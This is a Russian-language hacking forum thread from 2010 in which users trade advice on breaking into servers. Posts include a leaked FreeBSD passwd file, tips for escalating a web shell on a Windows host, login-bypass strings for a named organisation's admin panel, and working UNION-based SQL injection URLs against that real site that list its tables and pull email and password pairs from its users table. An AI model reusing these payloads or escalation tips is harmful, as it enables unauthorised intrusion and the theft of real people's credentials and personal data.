31.03.2010, 15:06
|
|
Участник форума
Регистрация: 13.04.2009
Сообщений: 121
С нами:
8988613
Репутация:
33
|
|
на руках лежит "/etc/passwd". как его рационально использовать? можно на фтп попасть?
# $FreeBSD: src/etc/master.passwd,v 1.40.20.1 2009/04/15 03:14:26 kensmith Exp $
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64  flogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
webmaster:*:1001:0:User &:/home/webmaster:/bin/sh
mysql:*:88:88:MySQL Daemon:/nonexistent:/sbin/nologin
ftp:*:14:5:Anonymous Ftp:/var/ftp:/nonexistent cпасибо! |
|
|
31.03.2010, 15:31
|
|
Участник форума
Регистрация: 26.07.2008
Сообщений: 267
С нами:
9364549
Репутация:
184
|
|
olishort
Нельзя. Пассы можно увидеть в master.passwd, но для этого надо иметь права высокие.
|
|
|
|
31.03.2010, 18:56
|
|
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
С нами:
8854580
Репутация:
34
|
|
если у тебя file_priv:Y (есть возможность читать файлы на сервере), попробуй читать исходники страниц сайта...это может очень помочь
|
|
|
|
31.03.2010, 19:08
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
Собственно вопрос знатокам, есть шелл на сервере под виндой, права типо зеленые , но! ничего там не сделать ни править, ни закачать..., захожу в практически любую папку на серванте, нужен пароль от юзера БД (MYSQL), из конфигов вычитал другого юзверя но у него мало прав.Собственно хочу через пхпмайадмин залить другой шелл, может справами будет получше..или другие идейки как мне заполучить нормально работающий шелл
|
|
|
|
31.03.2010, 21:30
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
Сообщение от Gorev
Собственно вопрос знатокам, есть шелл на сервере под виндой, права типо зеленые , но! ничего там не сделать ни править, ни закачать..., захожу в практически любую папку на серванте, нужен пароль от юзера БД (MYSQL), из конфигов вычитал другого юзверя но у него мало прав.Собственно хочу через пхпмайадмин залить другой шелл, может справами будет получше..или другие идейки как мне заполучить нормально работающий шелл
так у самого юзверя БД права файловые есть?
|
|
|
|
31.03.2010, 21:53
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
Сообщение от попугай
так у самого юзверя БД права файловые есть?
нет к сожаленью, если бы были то не спрашивал бы
|
|
|
|
31.03.2010, 21:59
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
Сообщение от Gorev
нет к сожаленью, если бы были то не спрашивал бы
Ну тогда не зальешь. Да даже если бы и были права, и получилось бы залить php-шелл, то ты был бы в той же ситуации, что и сейчас - править, заливать не сможешь ничего. PHP под IIS(а там он судя по описанию) обычно сильно урезан в правах. Попробуй ливануть asp-шелл или coldfusion (если там стоит)
|
|
|
|
31.03.2010, 22:49
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
С нами:
8803961
Репутация:
8
|
|
Есть админка: http://www.rbeurope.org/admin
Там два поля. При подстановке в логин ' or 1=1/* . Походу фильтруется /*.
Что можно еще сделать?
|
|
|
|
31.03.2010, 22:59
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
С нами:
8772211
Репутация:
56
|
|
Сообщение от FlaktW
Есть админка: http://www.rbeurope.org/admin
Там два поля. При подстановке в логин ' or 1=1/* . Походу фильтруется /*.
Что можно еще сделать?
Если действительно фильтруеться слеш и нужно отбросить запрос, попробуй "--" или "--+" или ")--+", если там канечно в этом дело, посмотреть не могу.
Последний раз редактировалось Redwood; 31.03.2010 в 23:06..
|
|
|
|
31.03.2010, 22:59
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
С нами:
9000386
Репутация:
1148
|
|
Код:
_http://www.rbeurope.org/afiseaza.php?id=20+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,version%28%29,25,26,27--+
Таблицы:
Код HTML:
articole:butic_livrari:butic_optiuni:butic_zone:cat_activite:citizenships:county:docs:emails:events:eventsdetails:eventspictures:hotel_prices:imagini:institute:letters:limbi:livration:mesaje:mesaje_admin:mesaje_old:monede:newsletter:persons:pictures:plati:plati_backup:produse:registration_fees:rezervari_hotel:scroll:seminar:sess:specific:tari:users:users_backup
Код:
_http://www.rbeurope.org/afiseaza.php?id=20+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,GROUP_CONCAT%28COLUMN_NAME%20SEPARATOR%200x3a%29%20,25,26,27+FROM%20information_schema.COLUMNS%20WHERE%20TABLE_NAME=0x7573657273--+
Колонки users:
Код HTML:
id:title:lastname:firstname:email:password:position:organization:postal_address:compl_address:zip_code:town:id_tari:id_citizenships:phone:fax:nametag_name:nametag_affiliation:reg_fees:dinner1:dinner2:flag:platit:valoare
Код:
_http://www.rbeurope.org/afiseaza.php?id=20+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,concat_ws%280x3a,email,password%29%20,25,26,27+FROM+users+limit+303,1--+
Кстати, не набирайте никто http://www.rbeurope.org/login.php 
Последний раз редактировалось Strilo4ka; 31.03.2010 в 23:21..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
